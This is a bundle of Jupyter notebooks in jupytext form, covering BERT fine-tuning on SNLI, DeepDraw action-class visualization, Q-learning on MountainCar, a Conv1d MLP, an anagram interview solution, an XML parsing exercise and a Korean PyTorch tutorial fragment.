``가중치(wiehgt) = 가중치(weight) - 학습율(learning rate) * 변화도(gradient)`` # # 간단한 Python 코드로 이를 구현해볼 수 있습니다: # # .. 
code:: python # # learning_rate = 0.01 # for f in net.parameters(): # f.data.sub_(f.grad.data * learning_rate) # # 신경망을 구성할 때 SGD, Nesterov-SGD, Adam, RMSProp 등과 같은 다양한 갱신 규칙을 # 사용하고 싶을 수 있습니다. 이를 위해서 ``torch.optim`` 라는 작은 패키지에 이러한 # 방법들을 모두 구현해두었습니다. 사용법은 매우 간단합니다: # # # + import torch.optim as optim # Optimizer를 생성합니다. optimizer = optim.SGD(net.parameters(), lr=0.01) # 학습 과정(training loop)에서는 다음과 같습니다: optimizer.zero_grad() # zero the gradient buffers output = net(input) loss = criterion(output, target) loss.backward() optimizer.step() # Does the update # - # .. Note:: # # ``optimizer.zero_grad()`` 를 사용하여 수동으로 변화도 버퍼를 0으로 설정하는 # 것에 유의하세요. 이는 `역전파(Backprop)`_ 섹션에서 설명한 것처럼 변화도가 # 누적되기 때문입니다. # #
docs/_downloads/c029676472d90691aa145c6fb97a61c3/neural_networks_tutorial.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     name: python3
# ---

# + id="1PWRp6JI3U45" colab_type="code"
# Fine-tune BERT (bert-base-uncased) for 3-way natural language inference on SNLI.
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data import RandomSampler, SequentialSampler

# !pip install transformers
# !pip install wget
# !pip install jsonlines

import transformers
from transformers import BertTokenizer
from transformers import BertForSequenceClassification, AdamW, BertConfig
from keras.preprocessing.sequence import pad_sequences
from sklearn.model_selection import train_test_split
import wget
import json
import jsonlines
import os

# + id="jHnvOe9U4v8v" colab_type="code"
######### Setting GPU device #########
if torch.cuda.is_available():
    device = torch.device('cuda')
else:
    device = torch.device('cpu')
print(device)

# + id="S54BrfEB3nIh" colab_type="code"
########## Download SNLI dataset ############
snli_url = "https://nlp.stanford.edu/projects/snli/snli_1.0.zip"
if not os.path.exists('./snli_1.0.zip'):
    wget.download(snli_url, './snli_1.0.zip')

# Unzip the dataset (the unzip itself is a notebook magic).
if not os.path.exists('./snli_1.0/'):
    # !unzip snli_1.0.zip
    pass  # BUG FIX: the `if` body was only a commented-out magic -> SyntaxError as a script


def processed_snli_data(path):
    """Read an SNLI .jsonl split and BERT-tokenize premise+hypothesis pairs.

    Args:
        path: path to an snli_1.0_*.jsonl file.

    Returns:
        (sent, labels): lists of token ids (with [CLS]/[SEP] added) and the
        corresponding string gold labels. Examples whose gold label is "-"
        (no annotator consensus) are dropped.
    """
    hyp_prem = []
    labels = []
    with jsonlines.open(path, "r") as f:
        for line in f.iter():
            ex = json.loads(json.dumps(line))
            if ex['gold_label'] != "-":
                # NOTE(review): the two sentences are joined with a space, not
                # a [SEP] token, so BERT sees them as a single segment.
                hyp_prem.append(ex['sentence1'] + " " + ex['sentence2'])
                labels.append(ex['gold_label'])
    # hyp_prem = hyp_prem[:160000]
    # labels = labels[:160000]
    tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)
    print(hyp_prem[0])
    print(tokenizer.tokenize(hyp_prem[0]))
    sent = []
    for sentence in hyp_prem:
        # add_special_tokens=True prepends [CLS] and appends [SEP].
        sent.append(tokenizer.encode(sentence, add_special_tokens=True))
    print(sent[0])
    return sent, labels


def snli_dataloader(sentence, lab, turn):
    """Pad/mask tokenized sentences and wrap them in train/test DataLoaders.

    Args:
        sentence: list of token-id lists from processed_snli_data.
        lab: list of string gold labels.
        turn: "train" keeps a 10% holdout, anything else keeps 1%.

    Returns:
        (train_loader, test_loader) yielding (ids, attention_mask, label)
        batches of size 32.
    """
    max_len = 112
    # Map string labels to integer classes 0/1/2.
    label_map = {'neutral': 0, 'entailment': 1, 'contradiction': 2}
    labels = [label_map[y] for y in lab]

    sentence = pad_sequences(sentence, maxlen=max_len, dtype="long",
                             value=0, truncating="post", padding="post")
    print(sentence[0])

    # Attention mask: 1 for real tokens, 0 for padding.
    mask = [[int(word_id > 0) for word_id in s] for s in sentence]
    print(mask[2])

    test_size = 0.1 if turn == "train" else 0.01
    train_set, test_set, train_labels, test_labels = train_test_split(
        sentence, labels, random_state=2018, test_size=test_size)
    # Same random_state/test_size so the masks line up with the id split.
    train_mask, test_mask, _, _ = train_test_split(
        mask, labels, random_state=2018, test_size=test_size)
    print("train set size", len(train_set), len(train_labels))
    print("test set size", len(test_set))
    print()

    ######## convert NumPy arrays to Tensor data ########
    print(train_set.shape)
    print(train_labels[:10])
    train_set = torch.tensor(train_set)
    test_set = torch.tensor(test_set)
    train_labels = torch.tensor(np.array(train_labels))
    test_labels = torch.tensor(np.array(test_labels))
    train_mask = torch.tensor(train_mask)
    test_mask = torch.tensor(test_mask)
    print("train data shape", train_set.shape)
    # BUG FIX: this line previously printed the train-labels shape under the
    # caption "test data shape".
    print("train labels shape", train_labels.shape)
    print("train mask shape", train_mask.shape)

    ####### Dataloader to load train and test data in batches ########
    batch_size = 32  # recommended in the BERT paper
    train = TensorDataset(train_set, train_mask, train_labels)
    train_loader = DataLoader(train, batch_size=batch_size,
                              sampler=RandomSampler(train))
    test = TensorDataset(test_set, test_mask, test_labels)
    test_loader = DataLoader(test, batch_size=batch_size,
                             sampler=RandomSampler(test))
    return train_loader, test_loader


# + id="Ny_oP1OR4KgE" colab_type="code"
train_sent, labels = processed_snli_data("./snli_1.0/snli_1.0_train.jsonl")
print(len(train_sent))
print('Max sentence length: ', max([len(sen) for sen in train_sent]))
snli_trainloader, _ = snli_dataloader(train_sent, labels, "train")

# + id="mmRc_rBp4m3x" colab_type="code"
####### define the model ###########
# BUG FIX: SNLI is a 3-way task (neutral/entailment/contradiction) and the
# loaders emit labels in {0, 1, 2}; num_labels was previously 2, which makes
# the classification head/cross-entropy loss reject label 2.
bert_model = BertForSequenceClassification.from_pretrained(
    "bert-base-uncased",
    num_labels=3,
    output_attentions=False,
    output_hidden_states=False,
)
bert_model = bert_model.to(device)

# + id="vswLPN2D49RA" colab_type="code"
######## define optimizer, write accuracy fn ###########
optimizer = AdamW(bert_model.parameters(), lr=2e-5, eps=1e-8)
num_epochs = 4
loss_arr = []


def compute_accuracy(preds, targets):
    """Mean accuracy of argmax(preds, dim=1) against integer targets."""
    return (torch.argmax(preds, dim=1) == targets).float().mean().item()


# + id="L6SYEVyj5Dmw" colab_type="code"
############### TRAINING OF BERT MODEL ##################
for ep in range(num_epochs):
    bert_model.train()
    epoch_loss = 0
    for i, data in enumerate(snli_trainloader):
        batch_data = data[0].to(device).long()
        batch_mask = data[1].to(device).long()
        batch_labels = data[2].to(device).long()
        bert_model.zero_grad()
        # Passing labels makes the model return (loss, logits) as a tuple.
        pred = bert_model(batch_data, token_type_ids=None,
                          attention_mask=batch_mask, labels=batch_labels)
        loss = pred[0]
        epoch_loss += loss.item()
        loss.backward()  # Backpropagation
        # Clip gradient norm to mitigate exploding gradients.
        torch.nn.utils.clip_grad_norm_(bert_model.parameters(), 1.0)
        optimizer.step()
    epoch_loss /= len(snli_trainloader)
    print("train loss after %d epochs is %f " % (ep + 1, epoch_loss))
    loss_arr.append(epoch_loss)

# + id="gzk21awU5aAb" colab_type="code"
############## Load test data ####################
test_sent, labels = processed_snli_data("./snli_1.0/snli_1.0_test.jsonl")
print(len(test_sent))
print('Max sentence length: ', max([len(sen) for sen in test_sent]))
snli_testloader, _ = snli_dataloader(test_sent, labels, "test")
print(len(snli_testloader))
test_acc = 0.0
steps = 0

# + id="Ep9WT0-Z5gjJ" colab_type="code"
######### Performance over Test set ##############
bert_model.eval()
for batch in snli_testloader:
    batch = tuple(t.to(device) for t in batch)
    batch_data, batch_mask, batch_labels = batch
    with torch.no_grad():
        preds = bert_model(batch_data, token_type_ids=None,
                           attention_mask=batch_mask)
    logits = preds[0].detach().cpu()
    targets = batch_labels.to('cpu')
    test_acc += compute_accuracy(logits, targets)
    steps += 1
print("final test set accuracy is ", (test_acc / steps))
BERT_snli.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [default] # language: python # name: python2 # --- # ### Visualizing Action Classes Learned with RGB Flow Models # # This notebook is adapted from the original DeepDraw notebook. In particular, this notebook generates RGB images from action recognition models trained on RGB frames. The output is a image refelecting the knowledge in the model of a specific action class. # # ------ # # # This is an ipython notebook to generate visualizations of classes with GoogLeNet, for some more info refer to [this blogpost](http://auduno.com/post/125362849838/visualizing-googlenet-classes), and for some examples of generated images see [this](https://goo.gl/photos/8qcvjnYBQVSGG2eN6) album of highlights or [this](https://goo.gl/photos/FfsZZektqpZkdDnKA) album of all 1000 imagenet classes. # # To run this code, you'll need an installation of Caffe with built pycaffe libraries, as well as the python libraries numpy, scipy and PIL. For instructions on how to install Caffe and pycaffe, refer to the installation guide [here](http://caffe.berkeleyvision.org/installation.html). Before running the ipython notebooks, you'll also need to download the [bvlc_googlenet model](https://github.com/BVLC/caffe/tree/master/models/bvlc_googlenet), and modify the variables ```pycaffe_root``` to refer to the path of your pycaffe installation (if it's not already in your python path) and ```model_path``` to refer to the path of the googlenet caffe model. Also uncomment the line that enables GPU mode if you have built Caffe with GPU-support and a suitable GPU available. 
#
# DeepDraw-style class visualization for a TSN RGB action-recognition model.
# Runs octave-wise gradient ascent on an input image to maximize one output
# class of a Caffe GoogLeNet/BN-Inception network. Python 2 / pycaffe code.

caffe_path = '/path/to/caffe_root'
tsn_path = '/path/to/tsn'
save_path = ''

# which action class to visualize (0-based), to view the class name, see <tsn_path>/data/ucf101_splits/classInd.txt
action_class = 48

# +
# imports and basic notebook setup
from cStringIO import StringIO
import numpy as np
import os,re,random
import scipy.ndimage as nd
import PIL.Image
import sys
from IPython.display import clear_output, Image, display
from scipy.misc import imresize

pycaffe_root = caffe_path+"/python"
sys.path.insert(0, pycaffe_root)
import caffe

model_name = "TSN-BN-Inception-RGB"
net_fn = './tsn_bn_inception_rgb_deploy.prototxt'
param_fn = tsn_path+'models/ucf101_split1_tsn_rgb_reference_bn_inception.caffemodel'
# Per-channel (BGR) pixel mean subtracted from inputs.
mean = np.float32([104.0, 117.0, 123.0])

caffe.set_mode_gpu() # uncomment this if gpu processing is available
caffe.set_device(0)

net = caffe.Classifier(net_fn, param_fn,
                       mean = mean, # ImageNet mean, training set dependent
                       channel_swap = (2,1,0)) # the reference model has channels in BGR order instead of RGB

# a couple of utility functions for converting to and from Caffe's input image layout
def preprocess(net, img):
    # HWC RGB -> CHW BGR, mean-subtracted (Caffe layout).
    return np.float32(np.rollaxis(img, 2)[::-1]) - net.transformer.mean['data']

def deprocess(net, img):
    # Inverse of preprocess: CHW BGR -> HWC RGB with the mean added back.
    return np.dstack((img + net.transformer.mean['data'])[::-1])

def blur(img, sigma):
    # Gaussian-blur each channel in place; no-op when sigma == 0.
    if sigma > 0:
        img[0] = nd.filters.gaussian_filter(img[0], sigma, order=0)
        img[1] = nd.filters.gaussian_filter(img[1], sigma, order=0)
        img[2] = nd.filters.gaussian_filter(img[2], sigma, order=0)
    return img

def showarray(a, f, fmt='jpeg'):
    # Clip to displayable range and render inline in the notebook.
    # NOTE(review): the `f` parameter (a filename at every call site) is
    # immediately shadowed by a StringIO buffer, so nothing is ever written
    # to disk here — presumably saving was removed intentionally; confirm.
    a = np.uint8(np.clip(a, 0, 255))
    f = StringIO()
    PIL.Image.fromarray(a).save(f, fmt)
    display(Image(data=f.getvalue()))
# -

# Main gradient ascent functions, based on Google's deepdream code and
# Kyle McDonald's variant.

# +
def make_step(net, step_size=1.5, end='inception_4c/output', clip=True, focus=None, sigma=None):
    '''Basic gradient ascent step.

    Forward to layer `end`, set a one-hot gradient on unit `focus`,
    backprop to the input, and take a normalized ascent step on the image,
    followed by an optional clip to valid pixel range and a Gaussian blur
    (the blur acts as a regularizer on the generated image).
    '''
    src = net.blobs['data'] # input image is stored in Net's 'data' blob
    dst = net.blobs[end]

    net.forward(end=end)

    one_hot = np.zeros_like(dst.data)
    one_hot.flat[focus] = 1.
    dst.diff[:] = one_hot

    net.backward(start=end)
    g = src.diff[0]

    # Normalize step by the mean absolute gradient so step_size is in pixels.
    src.data[:] += step_size/np.abs(g).mean() * g

    if clip:
        bias = net.transformer.mean['data']
        src.data[:] = np.clip(src.data, -bias, 255-bias)

    src.data[0] = blur(src.data[0], sigma)

    # reset objective for next step
    dst.diff.fill(0.)

def deepdraw(net, base_img, octaves, random_crop=True, visualize=True, focus=None,
    clip=True, **step_params):
    # Octave-wise gradient ascent: for each octave, optionally upscale the
    # working image, then repeatedly (crop ->) ascend -> paste back.
    # prepare base image
    image = preprocess(net, base_img) # (3,224,224)

    # get input dimensions from net
    w = net.blobs['data'].width
    h = net.blobs['data'].height

    print "starting drawing"
    src = net.blobs['data']
    src.reshape(1,3,h,w) # resize the network's input image size
    for e,o in enumerate(octaves):
        if 'scale' in o:
            # resize by o['scale'] if it exists
            image = nd.zoom(image, (1,o['scale'],o['scale']))
        _,imw,imh = image.shape

        # select layer
        layer = o['layer']

        for i in xrange(o['iter_n']):
            if imw > w:
                if random_crop:
                    # randomly select a crop, normally distributed around the center
                    #ox = random.randint(0,imw-224)
                    #oy = random.randint(0,imh-224)
                    mid_x = (imw-w)/2.
                    width_x = imw-w
                    ox = np.random.normal(mid_x, width_x*0.3, 1)
                    ox = int(np.clip(ox,0,imw-w))
                    mid_y = (imh-h)/2.
                    width_y = imh-h
                    oy = np.random.normal(mid_y, width_y*0.3, 1)
                    oy = int(np.clip(oy,0,imh-h))
                    # insert the crop into src.data[0]
                    src.data[0] = image[:,ox:ox+w,oy:oy+h]
                else:
                    # deterministic center crop
                    ox = (imw-w)/2.
                    oy = (imh-h)/2.
                    src.data[0] = image[:,ox:ox+w,oy:oy+h]
            else:
                # image fits the network input; no cropping needed
                ox = 0
                oy = 0
                src.data[0] = image.copy()

            # linearly interpolate blur radius and step size over the octave
            sigma = o['start_sigma'] + ((o['end_sigma'] - o['start_sigma']) * i) / o['iter_n']
            step_size = o['start_step_size'] + ((o['end_step_size'] - o['start_step_size']) * i) / o['iter_n']

            make_step(net, end=layer, clip=clip, focus=focus, sigma=sigma, step_size=step_size)

            if visualize:
                vis = deprocess(net, src.data[0])
                if not clip:
                    # adjust image contrast if clipping is disabled
                    vis = vis*(255.0/np.percentile(vis, 99.98))
                if i % 1 == 0:
                    showarray(vis,"./filename"+str(i)+".jpg")

            if i % 50 == 0 or i ==o['iter_n']-1:
                print 'finished step %d in octave %d' % (i,e)

            # insert modified image back into original image (if necessary)
            image[:,ox:ox+w,oy:oy+h] = src.data[0]

        print "octave %d image:" % e
        showarray(deprocess(net, image),"./octave_"+str(e)+".jpg")
    # returning the resulting image
    return deprocess(net, image)
# -

# Octave schedule: which layer to optimize, iterations, optional upscale,
# and start/end values for the blur sigma and the ascent step size.

# +
# these octaves determine gradient ascent steps
octaves = [
    {
        'layer':'fc-action',
        'iter_n':190,
        'start_sigma':2.5,
        'end_sigma':0.78,
        'start_step_size':11.,
        'end_step_size':11.
    },
    {
        'layer':'fc-action',
        'scale':1.2,
        'iter_n':150,
        'start_sigma':0.78*1.2,
        'end_sigma':0.5,
        'start_step_size':6.,
        'end_step_size':6.
    },
    {
        'layer':'fc-action',
        'scale':1.2,
        'iter_n':150,
        'start_sigma':0.78*1.2,
        'end_sigma':0.44,
        'start_step_size':6.,
        'end_step_size':3.
    },
    {
        'layer':'fc-action',
        'iter_n':10,
        'start_sigma':0.44,
        'end_sigma':0.304,
        'start_step_size':3.,
        'end_step_size':3.
    }
]

# get original input size of network
original_w = net.blobs['data'].width
original_h = net.blobs['data'].height
# the background color of the initial image
background_color = np.float32([200.0, 200.0, 200.0])
# generate initial random image
gen_image = np.random.normal(background_color, 12, (original_w, original_h, 3))

# generate class visualization via octavewise gradient ascent
gen_image = deepdraw(net, gen_image, octaves, focus=action_class,
                 random_crop=True, visualize=False)

# save image
import os
img_fn = os.path.join(save_path, '_'.join(["tsn_visualization_rgb", str(action_class)+'.png']))
PIL.Image.fromarray(np.uint8(gen_image)).save(img_fn)
# -
deepdraw-TSN-RGB.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python [conda env:openmined2] # language: python # name: conda-env-openmined2-py # --- # + import socketio sio = socketio.Client() sio.connect('http://localhost:5000') # - def send_ack(): sio.emit('client_ack', 'android') send_ack()
examples/android/Android Proxy.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: 'Python 3.8.10 64-bit (''dennybritz-reinforcement-learning-vHFc5M9T'':
#       pipenv)'
#     name: python3
# ---

# +
# %matplotlib inline

# Q-Learning with linear value-function approximation (RBF features) on
# the MountainCar-v0 environment.
import gym
import itertools
import matplotlib
import numpy as np
import sys
import sklearn.pipeline
import sklearn.preprocessing

if "../" not in sys.path:
    sys.path.append("../")

from lib import plotting
from sklearn.linear_model import SGDRegressor
from sklearn.kernel_approximation import RBFSampler

matplotlib.style.use('ggplot')
# -

env = gym.envs.make("MountainCar-v0")

# +
# Feature Preprocessing: Normalize to zero mean and unit variance
# We use a few samples from the observation space to do this
observation_examples = np.array([env.observation_space.sample() for x in range(10000)])
scaler = sklearn.preprocessing.StandardScaler()
scaler.fit(observation_examples)

# Used to convert a state to a featurized represenation.
# We use RBF kernels with different variances to cover different parts of the space
featurizer = sklearn.pipeline.FeatureUnion([
    ("rbf1", RBFSampler(gamma=5.0, n_components=100)),
    ("rbf2", RBFSampler(gamma=2.0, n_components=100)),
    ("rbf3", RBFSampler(gamma=1.0, n_components=100)),
    ("rbf4", RBFSampler(gamma=0.5, n_components=100))
])
featurizer.fit(scaler.transform(observation_examples))
# -

class Estimator():
    """
    Value Function approximator: one linear SGD model per discrete action,
    over RBF features of the (scaled) state.
    """

    def __init__(self):
        # We create a separate model for each action in the environment's
        # action space. Alternatively we could somehow encode the action
        # into the features, but this way it's easier to code up.
        self.models = []
        for _ in range(env.action_space.n):
            model = SGDRegressor(learning_rate="constant")
            # We need to call partial_fit once to initialize the model
            # or we get a NotFittedError when trying to make a prediction.
            # This is quite hacky.
            model.partial_fit([self.featurize_state(env.reset())], [0])
            self.models.append(model)

    def featurize_state(self, state):
        """
        Returns the featurized representation for a state.
        """
        scaled = scaler.transform([state])
        featurized = featurizer.transform(scaled)
        return featurized[0]

    def predict(self, s, a=None):
        """
        Makes value function predictions.

        Args:
            s: state to make a prediction for
            a: (Optional) action to make a prediction for

        Returns
            If an action a is given this returns a single number as the
            prediction. If no action is given this returns a vector of
            predictions for all actions in the environment where pred[i]
            is the prediction for action i.
        """
        features = self.featurize_state(s)
        # BUG FIX: the original tested `if not a:`, which also matches a == 0,
        # so asking for action 0's value returned the full value vector.
        if a is None:
            return np.array([m.predict([features])[0] for m in self.models])
        return self.models[a].predict([features])[0]

    def update(self, s, a, y):
        """
        Updates the estimator parameters for a given state and action towards
        the target y.
        """
        features = self.featurize_state(s)
        self.models[a].partial_fit([features], [y])


def make_epsilon_greedy_policy(estimator, epsilon, nA):
    """
    Creates an epsilon-greedy policy based on a given Q-function approximator
    and epsilon.

    Args:
        estimator: An estimator that returns q values for a given state
        epsilon: The probability to select a random action. float between 0 and 1.
        nA: Number of actions in the environment.

    Returns:
        A function that takes the observation as an argument and returns
        the probabilities for each action in the form of a numpy array of
        length nA.
    """
    def policy_fn(observation):
        A = np.ones(nA, dtype=float) * epsilon / nA
        q_values = estimator.predict(observation)
        best_action = np.argmax(q_values)
        A[best_action] += (1.0 - epsilon)
        return A
    return policy_fn


def q_learning(env, estimator, num_episodes, discount_factor=1.0, epsilon=0.1, epsilon_decay=1.0):
    """
    Q-Learning algorithm for off-policy TD control using Function Approximation.
    Finds the optimal greedy policy while following an epsilon-greedy policy.

    Args:
        env: OpenAI environment.
        estimator: Action-Value function estimator
        num_episodes: Number of episodes to run for.
        discount_factor: Gamma discount factor.
        epsilon: Chance to sample a random action. Float between 0 and 1.
        epsilon_decay: Each episode, epsilon is decayed by this factor

    Returns:
        An EpisodeStats object with two numpy arrays for episode_lengths
        and episode_rewards.
    """
    # Keeps track of useful statistics
    stats = plotting.EpisodeStats(
        episode_lengths=np.zeros(num_episodes),
        episode_rewards=np.zeros(num_episodes))

    for i_episode in range(num_episodes):
        # The policy we're following (epsilon decays per episode).
        policy = make_epsilon_greedy_policy(
            estimator, epsilon * epsilon_decay**i_episode, env.action_space.n)

        # Reward of the previous episode, shown in the progress line below.
        last_reward = stats.episode_rewards[i_episode - 1]
        sys.stdout.flush()

        # Reset the environment and pick the first action
        state = env.reset()

        # Only used for SARSA, not Q-Learning
        next_action = None

        # One step in the environment
        for t in itertools.count():

            # Choose an action to take.
            # If we're using SARSA we already decided in the previous step.
            if next_action is None:
                action_probs = policy(state)
                action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
            else:
                action = next_action

            # Take a step
            next_state, reward, done, _ = env.step(action)

            # Update statistics
            stats.episode_rewards[i_episode] += reward
            stats.episode_lengths[i_episode] = t

            # TD Update
            q_values_next = estimator.predict(next_state)

            # Use this code for Q-Learning
            # Q-Value TD Target
            td_target = reward + discount_factor * np.max(q_values_next)

            # Use this code for SARSA TD Target for on policy-training:
            # next_action_probs = policy(next_state)
            # next_action = np.random.choice(np.arange(len(next_action_probs)), p=next_action_probs)
            # td_target = reward + discount_factor * q_values_next[next_action]

            # Update the function approximator using our target
            estimator.update(state, action, td_target)

            print("\rStep {} @ Episode {}/{} ({})".format(
                t, i_episode + 1, num_episodes, last_reward), end="")

            if done:
                break

            state = next_state

    return stats


estimator = Estimator()

# Note: For the Mountain Car we don't actually need an epsilon > 0.0
# because our initial estimate for all states is too "optimistic" which leads
# to the exploration of all states.
stats = q_learning(env, estimator, 100, epsilon=0.0)

plotting.plot_cost_to_go_mountain_car(env, estimator)

plotting.plot_episode_stats(stats, smoothing_window=25)
6. FA/Q-Learning with Value Function Approximation Solution.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import torch
import torch.nn as nn
import numpy as np
from copy import deepcopy


def activation_helper(activation):
    """Map an activation name to a torch module; identity for None.

    BUG FIX: `activation_helper` was referenced by MLP.__init__ but never
    defined in this file, so constructing an MLP raised NameError. This is
    the conventional helper used alongside this model.

    Args:
        activation: one of 'sigmoid', 'tanh', 'relu', 'leakyrelu', or None.

    Raises:
        ValueError: for an unrecognized activation name.
    """
    if activation == 'sigmoid':
        return nn.Sigmoid()
    if activation == 'tanh':
        return nn.Tanh()
    if activation == 'relu':
        return nn.ReLU()
    if activation == 'leakyrelu':
        return nn.LeakyReLU()
    if activation is None:
        return nn.Identity()
    raise ValueError('unsupported activation: %s' % activation)


class MLP(nn.Module):
    """MLP over a lag window of a multivariate series, via 1-D convolutions.

    The first Conv1d (kernel size = lag) mixes the `lag` most recent time
    steps of all input series; the following kernel-size-1 convolutions act
    as fully connected layers applied independently at every time step, with
    a single scalar output channel.

    Args:
        num_series: number of input series (input channels).
        lag: length of the history window consumed by the first layer.
        hidden: list of hidden-layer widths (must be non-empty).
        activation: activation name understood by activation_helper.
    """

    def __init__(self, num_series, lag, hidden, activation):
        super(MLP, self).__init__()
        self.activation = activation_helper(activation)

        # Set up network: lag-window layer first, then 1x1 "dense" layers
        # down to a single output channel.
        layer = nn.Conv1d(num_series, hidden[0], lag)
        modules = [layer]

        for d_in, d_out in zip(hidden, hidden[1:] + [1]):
            layer = nn.Conv1d(d_in, d_out, 1)
            modules.append(layer)

        # Register parameters.
        self.layers = nn.ModuleList(modules)

    def forward(self, X):
        """Forward pass.

        Args:
            X: tensor of shape (batch, time, series).

        Returns:
            Tensor of shape (batch, time - lag + 1, 1).
        """
        # Conv1d expects (batch, channels, time).
        X = X.transpose(2, 1)
        for i, fc in enumerate(self.layers):
            if i != 0:
                X = self.activation(X)
            X = fc(X)
        return X.transpose(2, 1)
# -
cs224w/ADDfile.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Anagram Solution
#
# ## Problem
#
# Given two strings, check to see if they are anagrams. An anagram is when the
# two strings can be written using the exact same letters (so you can just
# rearrange the letters to get a different phrase or word).
#
# For example:
#
# "public relations" is an anagram of "crap built on lies."
#
# "clint eastwood" is an anagram of "old west action"
#
# **Note: Ignore spaces and capitalization. So "d go" is an anagram of "God"
# and "dog" and "o d g".**
#
# ## Solution
#
# Two strings are anagrams when each letter occurs the same number of times in
# both — equivalently, when the two strings are equal after sorting their
# letters. The sorting formulation is a one-liner in Python:

def anagram(s1, s2):
    """Return True when s1 and s2 are anagrams, ignoring spaces and case."""
    def canonical(s):
        # Strip spaces, lowercase, and sort the remaining characters so that
        # any two anagrams map to the same canonical list.
        return sorted(s.replace(' ', '').lower())

    return canonical(s1) == canonical(s2)

anagram('dog','god')

anagram('clint eastwood','old west action')

anagram('aa','bb')

# The sorting approach above is simple but not optimal; in an interview you
# would probably be asked for a manual solution that counts letters, to test
# your understanding of hash tables.
# Let's build out a fuller solution using counting and Python dictionaries:

def anagram2(s1, s2):
    """Anagram check via letter counts (hash-table approach).

    Ignores spaces and capitalization. Runs in O(n) time with O(k) extra
    space for k distinct characters.
    """
    # Remove spaces and lowercase letters
    s1 = s1.replace(' ', '').lower()
    s2 = s2.replace(' ', '').lower()

    # Edge Case: different letter totals can never be anagrams.
    if len(s1) != len(s2):
        return False

    # Create counting dictionary (Note could use DefaultDict/Counter from
    # the collections module)
    count = {}

    # Fill dictionary for first string (add counts)
    for letter in s1:
        if letter in count:
            count[letter] += 1
        else:
            count[letter] = 1

    # Fill dictionary for second string (subtract counts)
    for letter in s2:
        if letter in count:
            count[letter] -= 1
        else:
            # BUG FIX: this was `count[letter] = 1`; a letter seen only in
            # the second string must start at -1 so that the all-zero check
            # below reads as "counts cancelled exactly".
            count[letter] = -1

    # Anagrams leave every count at exactly zero.
    for k in count:
        if count[k] != 0:
            return False

    # Otherwise they're anagrams
    return True


anagram2('dog','god')

anagram2('clint eastwood','old west action')

anagram2('dd','aa')

# A quick note on the second solution: collections.defaultdict would clean
# this code up quite a bit, and the final loop could be folded into the
# second one, but in the above implementation every step is very clear.
#
# # Test Your Solution
# Run the cell below to test your solution

# +
"""
RUN THIS CELL TO TEST YOUR SOLUTION
"""
from nose.tools import assert_equal


class AnagramTest(object):

    def test(self, sol):
        assert_equal(sol('go go go','gggooo'), True)
        assert_equal(sol('abc','cba'), True)
        assert_equal(sol('hi man','hi man'), True)
        assert_equal(sol('aabbcc','aabbc'), False)
        assert_equal(sol('123','1 2'), False)
        # BUG FIX: the original used the Python 2 print statement
        # (`print "..."`), which is a SyntaxError under this notebook's
        # declared Python 3 kernel.
        print("ALL TEST CASES PASSED")


# Run Tests
t = AnagramTest()
t.test(anagram)
# -

t.test(anagram2)

# # Good Job!
code/algorithms/course_udemy_1/Array Sequences/Array Sequences Interview Questions/Array Sequence Interview Questions - SOLUTIONS/Anagram Check - SOLUTION.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # XML example and exercise
# ****
# + study examples of accessing nodes in XML tree structure
# + work on exercise to be completed and submitted
# ****
# + reference: https://docs.python.org/2.7/library/xml.etree.elementtree.html
# + data source: http://www.dbis.informatik.uni-goettingen.de/Mondial
# ****

from xml.etree import ElementTree as ET

# ## XML example
document_tree = ET.parse( './data/mondial_database_less.xml' )

# print names of all countries
for child in document_tree.getroot():
    print (child.find('name').text)

# print names of all countries and their cities
for element in document_tree.iterfind('country'):
    print ('* ' + element.find('name').text + ':', end=''),
    capitals_string = ''
    # NOTE(review): Element.getiterator() is deprecated (removed in 3.9);
    # Element.iter() is the modern spelling.
    for subelement in element.getiterator('city'):
        capitals_string += subelement.find('name').text + ', '
    print (capitals_string[:-2])

# ****
# ## XML exercise
# Using data in 'data/mondial_database.xml', find:
# 1. 10 countries with the lowest infant mortality rates
# 2. 10 cities with the largest population
# 3. 10 ethnic groups with the largest overall populations
# 4. name and country of a) longest river, b) largest lake and
#    c) airport at highest elevation

document = ET.parse( './data/mondial_database.xml' )

# +
# print child and attributes
#for child in document.getroot():
#    print (child.tag, child.attrib)
# -

import pandas as pd

# Create a list of country and their Infant Mortality Rate
# (-1 is used as a sentinel for countries with no <infant_mortality> node).
country_imr=[]
for country in document.getroot().findall('country'):
    name = country.find('name').text
    infant_mortality_rate = country.find('infant_mortality')
    if infant_mortality_rate is not None:
        infant_mortality_rate=infant_mortality_rate.text
    else :
        infant_mortality_rate = -1
    country_imr.append((name, (float)(infant_mortality_rate)))

# ## 10 countries with the lowest infant mortality rates
# NOTE(review): DataFrame.sort() was removed in pandas 0.20; the modern
# equivalent is sort_index()/sort_values().
df = pd.DataFrame(country_imr, columns=['Country', 'Infant_Mortality_Rate'])
df_unknown_removed = df[df.Infant_Mortality_Rate != -1]
df_unknown_removed.set_index('Infant_Mortality_Rate').sort().head(10)

# Collect (city, population) pairs from cities nested under provinces and
# from cities directly under countries.
